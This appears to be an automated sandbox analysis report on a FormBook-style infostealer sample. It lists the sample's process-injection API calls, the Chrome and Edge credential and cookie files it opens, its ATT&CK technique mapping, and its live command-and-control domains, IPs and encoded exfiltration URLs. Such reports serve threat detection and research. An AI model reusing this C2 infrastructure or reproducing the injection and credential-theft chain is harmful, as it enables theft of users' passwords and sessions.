                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtAllocateVirtualMemory: Direct from: 0x77543C9C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtCreateUserProcess: Direct from: 0x7754371C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQueryInformationProcess: Direct from: 0x77542C26
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtResumeThread: Direct from: 0x77542FBC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtWriteVirtualMemory: Direct from: 0x7754490C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtDelayExecution: Direct from: 0x77542DDC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtAllocateVirtualMemory: Direct from: 0x77542BFC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtReadFile: Direct from: 0x77542ADC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtQuerySystemInformation: Direct from: 0x77542DFC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtResumeThread: Direct from: 0x775436AC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtNotifyChangeKey: Direct from: 0x77543C2C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtCreateMutant: Direct from: 0x775435CC
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtWriteVirtualMemory: Direct from: 0x77542E3C
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe | NtMapViewOfSection: Direct from: 0x77542D1C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: read write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread register set: target process: 8152
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Thread APC queued: target process: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2868008
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D287B1 LogonUserW
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00CD48D7
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D34C53 mouse_event,0_2_00D34C53
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\gH3LlhcRzg.exe"Jump to behavior
                Source: C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00D27CAF
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00D2874B
                Source: gH3LlhcRzg.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: gH3LlhcRzg.exe, YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: YLmLMhEKNXTfg.exe, 00000006.00000002.3227053331.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000006.00000000.1628689843.00000000016F1000.00000002.00000001.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000000.1778541629.0000000001261000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CF862B cpuid 0_2_00CF862B
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00D04E87
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D11E06 GetUserNameW,0_2_00D11E06
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00D03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00D03F3A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exeCode function: 0_2_00CD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CD49A0

Stealing of Sensitive Information

Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\ROUTE.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\ROUTE.EXE; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_81
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_XP
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_XPe
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_VISTA
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_7
Source: gH3LlhcRzg.exe; Binary or memory string: WIN_8
Source: gH3LlhcRzg.exe; Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000002.3226300583.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3225975390.0000000000720000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1711994414.00000000069E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3227836129.0000000002E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3229916982.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3227680610.0000000005F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1711288888.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.1716772538.00000000088D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe; Code function: 0_2_00D46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00D46283
Source: C:\Users\user\Desktop\gH3LlhcRzg.exe; Code function: 0_2_00D46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00D46747
MITRE ATT&CK Matrix (techniques listed per tactic, in matrix order; a number before a technique name is the report's signature-count badge for that technique, reproduced as printed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Encrypted for Impact; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1588237; Sample: gH3LlhcRzg.exe; Startdate: 10/01/2025; Architecture: WINDOWS; Score: 100)

• Start node: contacts www.pitaloka.xyz, www.366800008.xyz and 10 other IPs or domains; signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures; Performs DNS queries to domains with low reputation (www.366800008.xyz)
• gH3LlhcRzg.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
• svchost.exe (started by gH3LlhcRzg.exe): Maps a DLL or memory area into another process
• YLmLMhEKNXTfg.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
• ROUTE.EXE (started by YLmLMhEKNXTfg.exe, 13 files): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• YLmLMhEKNXTfg.exe (injected by ROUTE.EXE): contacts www.unlimitu.website 209.74.79.40 (ports 49980, 49981, 49982; MULTIBAND-NEWHOPEUS, United States), 031233226.xyz 144.76.229.203 (ports 49988, 49989, 49990; HETZNER-ASDE, Germany) and 7 other IPs or domains; Found direct / indirect Syscall (likely to bypass EDR)
• firefox.exe (started by ROUTE.EXE)

Antivirus detection (Source; Detection; Scanner; Label)

gH3LlhcRzg.exe; 37%; Virustotal
gH3LlhcRzg.exe; 91%; ReversingLabs; Win32.Trojan.AZORult
gH3LlhcRzg.exe; 100%; Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
                SourceDetectionScannerLabelLink
                https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp0%Avira URL Cloudsafe
                http://www.unlimitu.website/bhgd/0%Avira URL Cloudsafe
                http://www.rpa.asia/74m3/0%Avira URL Cloudsafe
                http://www.pitaloka.xyz0%Avira URL Cloudsafe
                http://www.deacapalla.online/9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.deacapalla.online/9tt6/0%Avira URL Cloudsafe
                http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1d0%Avira URL Cloudsafe
                http://www.031233226.xyz/lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA==0%Avira URL Cloudsafe
                http://www.einpisalpace.shop/2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.grimbo.boats/nuxf/0%Avira URL Cloudsafe
                http://digi-searches.com/px.js?ch=10%Avira URL Cloudsafe
                http://www.rpa.asia/74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://einpisalpace.shop/0%Avira URL Cloudsafe
                http://digi-searches.com/px.js?ch=20%Avira URL Cloudsafe
                http://www.pitaloka.xyz/iwk9/0%Avira URL Cloudsafe
                http://www.031233226.xyz/lgqt/0%Avira URL Cloudsafe
                http://www.autonomousoid.pro/m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw==0%Avira URL Cloudsafe
                http://www.unlimitu.website/bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv40%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==0%Avira URL Cloudsafe
                http://www.autonomousoid.pro/m1if/0%Avira URL Cloudsafe
                http://www.dejikenkyu.cyou/58m5/0%Avira URL Cloudsafe
                http://www.grimbo.boats/nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv40%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.deacapalla.online
                208.91.197.27
                truetrue
                  unknown
                  www.rpa.asia
                  160.25.166.123
                  truetrue
                    unknown
                    www.pitaloka.xyz
                    68.66.226.119
                    truetrue
                      unknown
                      www.unlimitu.website
                      209.74.79.40
                      truetrue
                        unknown
                        031233226.xyz
                        144.76.229.203
                        truetrue
                          unknown
                          www.einpisalpace.shop
                          188.114.97.3
                          truetrue
                            unknown
                            www.dejikenkyu.cyou
                            104.21.96.1
                            truetrue
                              unknown
                              www.grimbo.boats
                              172.67.182.198
                              truefalse
                                high
                                www.autonomousoid.pro
                                13.248.169.48
                                truetrue
                                  unknown
                                  www.nhengtai.net
                                  unknown
                                  unknownfalse
                                    unknown
                                    www.366800008.xyz
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.031233226.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.unlimitu.website/bhgd/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.deacapalla.online/9tt6/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rpa.asia/74m3/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.deacapalla.online/9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.031233226.xyz/lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.grimbo.boats/nuxf/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.einpisalpace.shop/2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.rpa.asia/74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.unlimitu.website/bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.pitaloka.xyz/iwk9/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.grimbo.boats/nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.031233226.xyz/lgqt/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.autonomousoid.pro/m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw==true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.autonomousoid.pro/m1if/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.dejikenkyu.cyou/58m5/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.pitaloka.xyzYLmLMhEKNXTfg.exe, 00000008.00000002.3229916982.00000000051CF000.00000040.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5HpROUTE.EXE, 00000007.00000002.3229283746.000000000423C000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.000000000372C000.00000004.00000001.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://dts.gnpge.comYLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://digi-searches.com/sk-logabpstatus.php?a=bFp4ODVzaXVsTFczSDdQcmZwbFVZRVY1RlBJVDJnQi9jS1A1dmQ1dROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
URL | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | ROUTE.EXE, 00000007.00000002.3231279183.000000000793E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
